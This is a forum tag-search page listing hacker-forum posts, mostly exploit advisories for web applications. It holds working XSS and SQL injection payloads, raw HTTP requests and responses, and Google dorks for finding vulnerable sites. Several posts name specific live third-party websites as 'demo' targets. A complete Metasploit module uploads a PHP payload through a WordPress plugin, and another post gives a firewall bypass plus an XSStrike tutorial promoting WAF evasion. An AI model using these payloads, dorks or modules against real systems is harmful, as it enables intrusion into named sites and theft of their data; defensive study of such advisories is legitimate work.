
Search the forums

Showing results for the tag 'xss'.



69 results found

  1. |--------------------------------------------------------------|
     |[+] Exploit Title: show book XSS Vulnerability
     |[+] Date: 27/10/2018
     |[+] Exploit Author: Rednofozi
     |[+] Tested on: Windows 10, parrot os
     |[+] Vendor Homepage: http://www.lib.ubu.ac.th
     |[+] dork: allinurl:/show-book.php?ID=
     |[+] ME: Rednofozi@hotmail.com
     |--------------------------------------------------------------|
     |[+] RHG hackers iran team
     |[+] Credits: Inj3ct0r
     |[+] Vulnerability Type: XSS Vulnerability
     |[+] Severity Level: Med.
     |[+] Exploit: info--------------> XSS Vulnerability
     ***************************************************************|
     [+] Google Search allinurl:/show-book.php?ID=
     [+] The End , Enjoy Of Hacking ...!
     <script>alert("rednofozi")</script>
     ***************************************************************|
     |--------------------------------------------------------------|
     XSS Vulnerability
     http://www.lib.ubu.ac.th/rarebook/show-book.php?id=132
     ****************************************************************
     Discovered by : Inj3ct0r |RHG Team hackers
     Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r
     http://www.exploit4arab.org/exploits/2199
  2. Rednofozi

    Kali Linux

    XSS attacks with XSStrike tool to test attacks and exploit them.

    XSS attacks with the XSStrike tool

    A tool for xss attacks that you can take from a variety of methods and methods. This professional tool lets you scan the site from this bug, which manages professional and specialized XSS.

    Possibilities
      • Use GET and POST methods
      • Ability to remove cookies
      • WAF Baptism
      • Ability to beat hard filters in strong firewalls
      • Use strong encryption
      • Making smart pills

    Explanation
      • Installed on Windows systems and Linux types
      • Using Python 2.7

    Use this tool to take your xss attacks a step further and work professionally.

    Installation

    First, get the hub from the gateway link:
      git clone https://github.com/UltimateHackers/XSStrike

    Inside the toolbox:
      cd XSStrike

    Start the installation with the following installation:
      pip install -r requirements.txt

    To run it:
      python xsstrike

    Or only:
      xsstrike

    xss tools one git - XSStrike tool for xss attacks

    download link https://github.com/UltimateHackers/XSStrike

    The gate
  3. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arash Khazaei', # EDB PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'EDB', '37998' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Responsive Thumbnail Slider Plugin v1.0', { } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 28 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]), OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]), OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ]) ]) end def check # The version regex found in extract_and_check_version does not work for this plugin's # readme.txt, so we build a custom one. 
check_code = check_version || check_plugin_path if check_code return check_code else return CheckCode::Safe end end def check_version plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.body && res.body =~ /Version:([\d\.]+)/ version = Gem::Version.new($1) if version <= Gem::Version.new('1.0') vprint_status("Plugin version found: #{version}") return CheckCode::Appears end end nil end def check_plugin_path plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/') res = send_request_cgi( 'method' => 'GET', 'uri' => plugin_uri ) if res && res.code == 200 vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected') return CheckCode::Detected end nil end def login auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD']) return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies) print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}") auth_cookies end def upload_payload(cookies) manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management' file_payload = get_write_exec_payload(:unlink_self => true) file_name = "#{rand_text_alpha(5)}.php" # attempt to access plugins page plugin_res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies ) unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page") end data = Rex::MIME::Message.new data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"") data.add_part(file_name.split('.')[0], nil, nil, "form-data; 
name=\"imagetitle\"") data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"") post_data = data.to_s # upload the file upload_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'), 'cookie' => cookies, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies) fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/) retrieve_file(page, cookies) end def retrieve_file(res, cookies) fname = res.body.scan(/slider\/(.*\.php)/).flatten[0] fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil? file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}") print_good("Successful upload") send_request_cgi( 'uri' => file_uri, 'method' => 'GET', 'cookie' => cookies ) end def exploit unless check == CheckCode::Safe auth_cookies = login upload_payload(auth_cookies) end end end
  4. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # 
POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  5. |[+] Exploit Title:Organizer XSS and SQL Injection Vulnerability |[+] Date:18/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://po.shaftnet.org/ |[+] dork:# "intext:"Powered by Photo Organizer" |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] Software Link: http://po.shaftnet.org/#download |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| 0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 
0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 
============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png **************************************************************** Discovered by :Rednofozi RGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2173
  6. rezasarwary

    Hacking-Bugs

    Hi, I found a site that has an XSS bug and I have gone through a few steps, but I want to change the content of one line of the site and it doesn't work. Maybe my code has a problem; could someone help me?

    Code: "/><script>document.getElementByClassName('head').innerHTML="HI ADMIN"</script>
  7. |--------------------------------------------------------------| |[+] Exploit Title:Powered Photo Organizer XSS and SQL Vulnerabilities |[+] Date:13/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://po.shaftnet.org/ |[+] dork:# "intext:"Powered by Photo Organizer" |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] Software Link: http://po.shaftnet.org/#download |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| 0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 
0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 
============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('sss')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png **************************************************************** Discovered by :RednofoziRGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2136
  8. Rednofozi

    Pro-Exploit

    [+] Exploit Title: eSearch Logistics Xss Vulnerability |[+] Date:13/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://www.esearchlogistics.com |[+] dork:# "inurl:"contentPage.php?id=" site:in' |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |-------------------------------------------------------------- |[+] RHG hackers iran team ***************************************************************| # {INFO} # ContentPage.php?ID= ----- Xss Vulnerability 1-Google opened 2-Reveal the item on Google 3-Then copy the sprite to the alert <script>alert("nofozi")</script> **************************************************************** # {DEMO} # 01: http://www.cat-egypt.com/ContentPage.php?ID=1_1 # 02: http://www.mrgreenwood.com/evolve/templates/contentpage.php?id=70 # 03: http://www.dependodrain.com/contentPage.php?id=5 # 04: http://www.dependodrain.com/contentPage.php?id=5 # 05 http://www.vinomaniawines.com/contentpage.php?id=34 # 06: # 07: # 08: <script>alert("nofozi")</script> # 09: # 10:----------------------------| **************************************************************** Discovered by : Rednofozi RGH team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2135
  9. |--------------------------------------------------------------| |[+] Exploit Title:Designed by Iranian Government Sites SQL Injection and xss Vulnerability |[+] Date:12/10/2018 [+] Category: Webapps |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Google Dork: 'inurl:/view_page_one.php?v=" |[+] Vendor Homepage : http://jovainco.com/ |[+] MY pageExploit: https://www.exploit-db.com/author/?a=2243 |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |--------------------------------------------------------------| |[+]|[+] Exploit :info # 1. Description: <script>alert("You Are Hacked")</script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ****************************************************************| |[+] Exploit Info : {DEMO} http://jovainco.com/view_page_one.php?v= You have an error in your SQL http://snco.ir/view_page_one.php?v= You have an error in your SQL hhttp://www.upsb.ir/view_page_one.php?v= You have an error in your SQL |--------------------------------------------------------------| http://www.exploit4arab.org/exploits/2131
  10. Rednofozi

    Hacking-Bugs

    Topic rules: no spam; no off-topic questions, ask those in the Q&A section. This topic is only for the commands that can be used to identify a bug. Instructors: inj3ct0r, Rednofozi, ReZa CLONER, Moeein Seven
  11. CMS ISWEB 3.5.3 XSS Reflected
      > CVE: CVE-2018-15562
      > Parameter vuln: ordineRis, sezioneRicerca oggettiRicerca
      > Vendor of Product: CMS ISWEB 3.5.3
      > Attack Vectors
        Payload: "><svg/onload=alert(String.fromCharCode(88,83,83))>
        URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>
      > Discoverer: Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza
  12. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Design by eSearch Logistics Xss Vulnerability # Exploit Author: Rednofozi # Date:29-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: http://www.esearchlogistics.com # OUR SITE : https://anonysec.org/ |==================================================================================== # {INFO} # ContentPage.php?ID= ----- Xss Vulnerability 1-Google opened 2-Reveal the item on Google 3-Then copy the sprite to the alert <script>alert("rednofozi")</script> |==================================================================================== # {DORK} # "inurl:"contentPage.php?id=" site:com' |==================================================================================== |==================================================================================== # {DEMO} # 01: http://www.cat-egypt.com/ContentPage.php?ID=1_1 # 02: http://www.mrgreenwood.com/evolve/templates/contentpage.php?id=70 # 03: http://www.dependodrain.com/contentPage.php?id=5 # 04: http://www.dependodrain.com/contentPage.php?id=5 # 05 http://www.vinomaniawines.com/contentpage.php?id=34 # 06: # 07: # 08: <script>alert("rednofozi")</script> # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi # >>> tlg me:rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2056
  13. # Exploit Title: WordPress WebARX Website Firewall - Stored XSS and firewall bypass.
      # Type: WordPress Plugin
      # Date: 2018-09-27
      # Exploit Author: ed0x21son
      # Vendor Homepage: https://www.webarxsecurity.com
      # Software Link: http://update.webarxsecurity.com/wp-update-server/?action=download&slug=webarx
      # Version: 1.3.0
      # Category: WebApps, WordPress
      # Tested on: WordPress 4.9.8

      [Vulnerabilities]

      #1: Unauthenticated stored XSS:
      curl -I -H 'X-Forwarded-For: <script>alert("U-H4V3-B33N-PWN3D")</script>' 'http://localhost/?xss=<script>alert(/pwn3d/)</script>'
      Go to Wordpress dashboard and view WebARX logs: pwnd!

      #2: Firewall bypass:
      U can bypass all firewall security and rules if u add "cc=1" to the Post or Get payload.
      Blocked by firewall:
      curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>'
      Not blocked by firewall:
      curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>&cc=1'
  14. Rednofozi

    Hacking

    Scan the websites you want online :) Free online XSS scanner
  15. [+] Title :- Photo Organizer - XSS and SQL Vulnerabilities
    [+] Date :- 2018-09-10
    [+] Exploit Author :- Rednofozi
    [+] Vendor Homepage :- http://po.shaftnet.org/
    [+] Version :- All Versions
    [+] Software Link: :- http://po.shaftnet.org/#download
    [+] Tested on :- Linux - Windows
    [+] Category :- webapps
    [+] Google Dorks :- intext:"Powered by Photo Organizer"
    [+] Team name :- Anonysec.org
    [+] Official Website :- nadaram :d
    [+] Contact :- Rednofozi@yahoo.com
    =========================================================
    ########################################################

    0x01# ~ Introduction
    ====================
    At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.

    0x02# ~ Exploitation
    ====================
    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    0 [+] Boolean SQL Injection & Blind [+] 0
    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    http://site.com/user.php?user=1 and 1=2
    http://site.com/user.php?user=1 union select 1,2--
    http://site.com/user.php?user=-1 OR 17-7=10

    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    0 [+] Reflected XSS Cross Site Scripting [+] 0
    1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
    Affected path(s):
    login.php
    search.text.general.php
    login.php?operation=get_email
    register.php

    ========================== HTTP REQUEST XSS 1 ==============================
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Referer: http://site.com/login.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 113
    POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0
    XSS Proof Image: http://i.imgur.com/VmbmuiZ.png
    ============================================================================

    ========================== HTTP REQUEST XSS 2 ==============================
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Referer: http://site.com/search.text.general.php
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 109
    POST: search_string='"><script>alert('1337')</script>&search_type=&current_user=all&x=0&y=0
